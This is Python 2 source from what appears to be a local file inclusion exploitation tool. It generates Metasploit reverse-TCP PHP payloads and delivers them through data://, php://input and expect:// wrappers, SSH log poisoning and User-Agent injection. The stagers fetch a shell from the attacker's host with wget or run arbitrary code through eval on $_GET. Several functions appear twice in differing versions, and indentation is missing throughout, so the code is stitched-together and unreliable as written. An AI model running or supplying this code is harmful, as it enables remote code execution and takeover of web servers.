encoded_payload = quote_plus(payload.encode('base64'))
""" Build data wrapper """
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
handle = Payload(lhost, lport)
handle.handler()
if self.nostager:
progressbar()
else:
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Starting Web Server ... ")
progressbar()
try:
p = subprocess.Popen(['python http_server.py'],
shell=True,
stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(
t.red("[{0}] ".format(datetime.datetime.now()) +
"Process Error"))(os_error)
raw_input(
t.red("[{0}] ".format(datetime.datetime.now())) +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
""" LFI payload that downloads the shell with try block for actual
attack """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
data_request = requests.get(lfi, cookies=f_cookies)
if data_request.status_code != 200:
print(
t.red("[{0}] ".format(datetime.datetime.now())) +
"Unexpected HTTP Response ")
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as data_error:
print(
t.red("[{0}] ".format(datetime.datetime.now())) +
"HTTP Error")(data_error)
sys.exit(1)
else:
try:
data_request = requests.get(lfi)
if data_request.status_code != 200:
print(
t.red("[{0}] ".format(datetime.datetime.now())) +
"Unexpected HTTP Response ")
else:
sys.exit(0)
except requests.HTTPError as data_error:
print(
t.red("[{0}] ".format(datetime.datetime.now())) +
"HTTP Error")(data_error)
sys.exit(1)
def execute_ssh(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
payload_file = open('/tmp/{0}.php'.format(shell), 'r')
payload_stage2 = quote_plus(payload_file.read())
payload_file.close()
payload = "<?php eval(\\$_GET['code'])?>"
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Start SSH Log Poisoning ..." + "\n")
host = urlparse.urlsplit(self.target).netloc
system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
print("\n")
print(
t.red("[{0}] ".format(datetime.datetime.now())) +
"Executing Shell!")
""" Attempt traverse """
if not self.relative:
lfi = self.target + self.location + '&code={0}'.format(
payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence * counter + self.location + '&code={0}'.format(
payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".
format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".
format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
def execute_environ(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
""" Handle staging """
if self.nostager:
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"No-Staged Selected!")
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(
payload_file.read().encode('base64').replace("\n", ""))
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
progressbar()
try:
p = subprocess.Popen(['python http_server.py'],
shell=True,
stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(
t.red("[{0}] ".format(datetime.datetime.now()) +
"Process Error"))(os_error)
""" Build LFI """
lfi = self.target + self.location
headers = {'User-Agent': payload}
raw_input(
t.cyan("[{0}] ".format(datetime.datetime)) +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
try:
if not self.relative:
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi,
headers=headers,
cookies=f_cookies)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence * counter + self.location
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi,
headers=headers,
cookies=f_cookies)
if r.status_code != 200:
print(
t.red(
"[{0}] Unexpected HTTP Response ".
format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(
t.red(
"[{0}] Unexpected HTTP Response ".
format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(access_error)
sys.exit(1)
except Exception as unknown_error:
print t.red("[{0}] Unknown Error ".format(
datetime.datetime.now()))(unknown_error)
sys.exit(1)
def execute_environ(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell),"r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(payload_file.read().encode('base64').replace("\n", ""))
payload_file.close()
progressbar()
else:
payload = stager_payload.format(lhost, shell)
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
""" Build LFI """
lfi = self.target + self.location
headers = {'User-Agent': payload}
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
try:
if not self.relative:
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, headers=headers, cookies=f_cookies)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence*counter + self.location
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, headers=headers, cookies=f_cookies)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
except Exception as unknown_error:
print t.red(" [!] Unknown Error ")(unknown_error)
def execute_input(self):
lhost, lport, shell = msf_payload()
""" Build payload """
wrapper = "php://input"
url = self.target + wrapper
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
handle = Payload(lhost, lport)
handle.handler()
if self.nostager:
progressbar()
else:
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Starting Web Server ... ")
progressbar()
try:
subprocess.Popen(['python http_server.py'], shell=True)
except OSError as os_error:
print(
t.red("[{0}] ".format(datetime.datetime.now()) +
"Process Error"))(os_error)
raw_input(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Press Enter To Continue When Your Metasploit Handler Is Running ..."
)
""" Handle cookies """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
input_request = requests.post(url,
data=payload,
cookies=f_cookies)
if input_request.status_code != 200:
print t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now()))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as input_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(input_error)
sys.exit(1)
else:
try:
input_request = requests.post(url, data=payload)
if input_request.status_code != 200:
print t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now()))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as input_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(input_error)
sys.exit(1)
def execute_input(self):
# Arguments needed for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
print(t.green(" [*] ") + "Generating Data Wrapper")
progressbar()
print(t.red(" [!] ") + "Success!")
print t.green(" [*] ") + "Generating Metasploit Payload"
progressbar()
# Generate PHP shell
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Handle Metasploit error codes
if msf.returncode != 0:
print(t.red(" [!] Error Generating MSF Payload "))
else:
print(t.green(" [*] ") + "Success!")
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
# Build php payload
wrapper = "php://input"
url = self.target + wrapper
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell),"r")
payload = payload_file.read()
payload_file.close()
else:
payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost,shell)
if self.nostager:
raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
else:
# Assuming if there is a server running on port 8000 hosting from /tmp
print(t.red(" [!] ") + "Is Your Server Running?")
print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
# Try block for actual attack
try:
dr = requests.post(url, data=payload)
if dr.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ") + str(input_error)
def execute_expect(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
""" Build payload """
""" Handle staging """
if self.nostager:
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"No-Staged Selected!")
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "expect://echo \""
payload += quote_plus(payload_file.read().replace("\"",
"\\\"").replace(
"$", "\\$"))
payload += "\" | php"
payload_file.close()
else:
payload = "expect://echo \"" + stager_payload.format(
lhost, shell) + "\" | php"
print(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Starting Web Server ... ")
progressbar()
try:
p = subprocess.Popen(['python http_server.py'],
shell=True,
stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(
t.red("[{0}] ".format(datetime.datetime.now()) +
"Process Error"))(os_error)
lfi = self.target + payload
raw_input(
t.cyan("[{0}] ".format(datetime.datetime.now())) +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as expect_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(expect_error)
sys.exit(1)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(
t.red("[{0}] Unexpected HTTP Response ".format(
datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as expect_error:
print t.red("[{0}] HTTP Error ".format(
datetime.datetime.now()))(expect_error)
sys.exit(1)
def execute_data(self):
lhost, lport, shell = msf_payload()
""" Build payload """
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
encoded_payload = quote_plus(payload.encode('base64'))
""" Build data wrapper """
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
handle = Payload(lhost, lport)
handle.handler()
if self.nostager:
progressbar()
else:
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
progressbar()
try:
p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)
raw_input(t.red("[{0}] ".format(
datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler is Running ...")
""" LFI payload that downloads the shell with try block for actual
attack """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
data_request = requests.get(lfi, cookies=f_cookies)
if data_request.status_code != 200:
print(t.red("[{0}] ".format(datetime.datetime.now())) + "Unexpected HTTP Response ")
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as data_error:
print(t.red("[{0}] ".format(datetime.datetime.now())) + "HTTP Error")(data_error)
sys.exit(1)
else:
try:
data_request = requests.get(lfi)
if data_request.status_code != 200:
print(t.red("[{0}] ".format(datetime.datetime.now())) + "Unexpected HTTP Response ")
else:
sys.exit(0)
except requests.HTTPError as data_error:
print(t.red("[{0}] ".format(datetime.datetime.now())) + "HTTP Error")(data_error)
sys.exit(1)
